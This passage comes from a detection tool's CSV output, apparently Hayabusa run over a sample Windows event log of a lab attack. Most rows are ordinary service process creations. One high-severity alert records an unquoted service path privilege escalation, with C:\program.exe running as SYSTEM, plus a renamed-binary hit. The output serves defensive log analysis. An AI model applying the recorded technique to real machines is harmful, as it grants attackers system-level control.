AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 808 | PGUID: 747F3D96-B764-5EA4-0000-0010FE6F0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:25.198 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x2 /state0:0xa3b08855 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 992 | PGUID: 
747F3D96-B764-5EA4-0000-0010DEBF0000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:25.211 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""dwm.exe"" | Process: C:\Windows\System32\dwm.exe | User: Window Manager\DWM-1 | Parent Cmd: winlogon.exe | LID: 0xbff6 | PID: 1000 | PGUID: 747F3D96-B764-5EA4-0000-001035C00000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:25.225 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1020 | PGUID: 747F3D96-B764-5EA4-0000-00105FC20000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:25.418 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 636 | PGUID: 747F3D96-B764-5EA4-0000-0010EAC90000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:25.432 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1104 | PGUID: 747F3D96-B764-5EA4-0000-0010A5D20000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:25.482 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1156 | PGUID: 747F3D96-B765-5EA4-0000-001032D70000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:25.485 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1212 | PGUID: 747F3D96-B765-5EA4-0000-001089DD0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:25.487 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1240 | PGUID: 747F3D96-B765-5EA4-0000-0010DCDF0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:25.600 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1308 | PGUID: 747F3D96-B765-5EA4-0000-00109FE80000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 
22:19:25.603 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1360 | PGUID: 747F3D96-B765-5EA4-0000-00104FEE0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:26.158 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\Upfc.exe /launchtype boot /cv pVnjz5d3jkOKEwXZiJ9/ng.0 | Process: C:\Windows\System32\upfc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1380 | PGUID: 747F3D96-B765-5EA4-0000-00107DF10000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:26.303 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 1500 | PGUID: 747F3D96-B765-5EA4-0000-0010EDFC0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:26.507 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 1536 | PGUID: 747F3D96-B765-5EA4-0000-001055010100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:26.536 
+00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1616 | PGUID: 747F3D96-B765-5EA4-0000-0010550A0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:26.540 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s SysMain | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1624 | PGUID: 747F3D96-B765-5EA4-0000-00108B0A0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:26.542 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1640 | PGUID: 747F3D96-B765-5EA4-0000-0010EA0A0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:26.558 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1676 | PGUID: 747F3D96-B765-5EA4-0000-00102B0F0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:26.632 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: 
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1780 | PGUID: 747F3D96-B765-5EA4-0000-001028190100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:26.635 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\dxgiadaptercache.exe | Process: C:\Windows\System32\dxgiadaptercache.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x3e7 | PID: 1876 | PGUID: 747F3D96-B765-5EA4-0000-0010831F0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:26.642 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1912 | PGUID: 747F3D96-B765-5EA4-0000-00109B240100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:26.643 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1920 | PGUID: 747F3D96-B765-5EA4-0000-001031250100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:26.645 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k 
LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1936 | PGUID: 747F3D96-B765-5EA4-0000-0010BE260100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:26.652 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1996 | PGUID: 747F3D96-B765-5EA4-0000-0010572D0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:27.196 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1440 | PGUID: 747F3D96-B765-5EA4-0000-00107A380100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:27.198 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1552 | PGUID: 747F3D96-B765-5EA4-0000-00100B390100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:27.473 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k 
LocalServiceNoNetworkFirewall -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2076 | PGUID: 747F3D96-B765-5EA4-0000-0010AA430100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:27.481 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20200425_221917_750.etl | Process: C:\Windows\System32\svchost.exe | PID: 2056 | PGUID: 747F3D96-B765-5EA4-0000-00106B420100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:27.484 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2204 | PGUID: 747F3D96-B765-5EA4-0000-0010344D0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:27.583 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2364 | PGUID: 747F3D96-B765-5EA4-0000-001016620100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:27.764 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation | Process: C:\Windows\System32\svchost.exe | User: NT 
AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 2408 | PGUID: 747F3D96-B766-5EA4-0000-0010C4680100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:27.836 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetSvcs -p -s iphlpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2476 | PGUID: 747F3D96-B766-5EA4-0000-0010366F0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:27.838 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 2488 | PGUID: 747F3D96-B766-5EA4-0000-001019700100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:27.855 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2496 | PGUID: 747F3D96-B766-5EA4-0000-001046700100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:27.970 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: 
C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 2632 | PGUID: 747F3D96-B766-5EA4-0000-0010A4790100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:28.014 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k utcsvc -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2640 | PGUID: 747F3D96-B766-5EA4-0000-0010067A0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:28.063 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2704 | PGUID: 747F3D96-B766-5EA4-0000-0010DE7E0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:28.065 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2736 | PGUID: 747F3D96-B766-5EA4-0000-0010A7800100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:28.068 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s SstpSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2772 | PGUID: 
747F3D96-B766-5EA4-0000-001074830100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:28.079 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wlms\wlms.exe | Process: C:\Windows\System32\wlms\wlms.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2848 | PGUID: 747F3D96-B766-5EA4-0000-0010D4880100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:28.080 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"PrivEsc - Potential Unquoted Service Exploit | Cmd: c:\Program Files\vulnsvc\mmm.exe | Process: C:\program.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2856 | PGUID: 747F3D96-B766-5EA4-0000-0010E7880100 | Hash: SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:28.080 +00:00,MSEDGEWIN10,1,medium,Evas,Renamed Binary,,rules/sigma/process_creation_sysmon/proc_creation_win_renamed_binary.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:28.086 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2876 | PGUID: 
747F3D96-B766-5EA4-0000-0010038A0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:28.096 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2900 | PGUID: 747F3D96-B766-5EA4-0000-00104A8D0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:28.465 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalService -p -s WdiServiceHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 3044 | PGUID: 747F3D96-B766-5EA4-0000-0010BAA10100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:32.050 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: sihost.exe | Process: C:\Windows\System32\sihost.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager | LID: 0x1d39b | PID: 3752 | PGUID: 747F3D96-B767-5EA4-0000-0010FE2E0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:32.058 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc | Process: C:\Windows\System32\svchost.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x1d39b | PID: 3760 | PGUID: 
747F3D96-B767-5EA4-0000-0010D0310200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:32.097 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService | Process: C:\Windows\System32\svchost.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x1d39b | PID: 3820 | PGUID: 747F3D96-B767-5EA4-0000-001097430200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:32.358 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 4264 | PGUID: 747F3D96-B768-5EA4-0000-00106FAE0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:35.125 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: winlogon.exe | LID: 0x1d39b | PID: 4536 | PGUID: 747F3D96-B769-5EA4-0000-00101D9C0300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:35.236 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x1d39b | PID: 4600 | PGUID: 747F3D96-B76A-5EA4-0000-0010EEB50300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
